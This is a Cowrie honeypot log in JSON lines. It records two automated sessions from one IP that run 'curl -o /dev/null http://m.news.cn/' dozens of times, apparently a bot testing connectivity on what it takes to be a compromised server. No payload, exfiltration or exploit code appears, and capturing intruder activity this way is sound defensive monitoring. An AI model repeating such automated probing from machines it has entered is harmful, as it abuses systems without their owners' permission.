{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.800814Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.804066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.804965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.809519Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.813612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.826652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.839967Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.840888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.843643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.844420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.863840Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.883587Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.884571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.887032Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.887856Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.909881Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.925923Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.931765Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.936506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.937397Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.939355Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.940305Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.944193Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.980575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.981753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.987908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.989942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.990908Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.002809Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.009470Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.012901Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.023894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.026021Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.027282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.034459Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.038793Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.040370Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.041326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.073620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.074743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.084694Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.088365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.089384Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.092229Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.115182Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.116288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.120448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.129644Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.130725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.138453Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.144730Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.151683Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.153203Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.154235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.160389Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.171811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.172924Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.177627Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.190244Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.191288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.212217Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.213266Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.227295Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.228402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.229548Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.240416Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.252615Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.253545Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.263590Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.264561Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.294620Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.300471Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.301566Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.306471Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.307556Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.308577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.316015Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.320915Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.322735Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.338798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
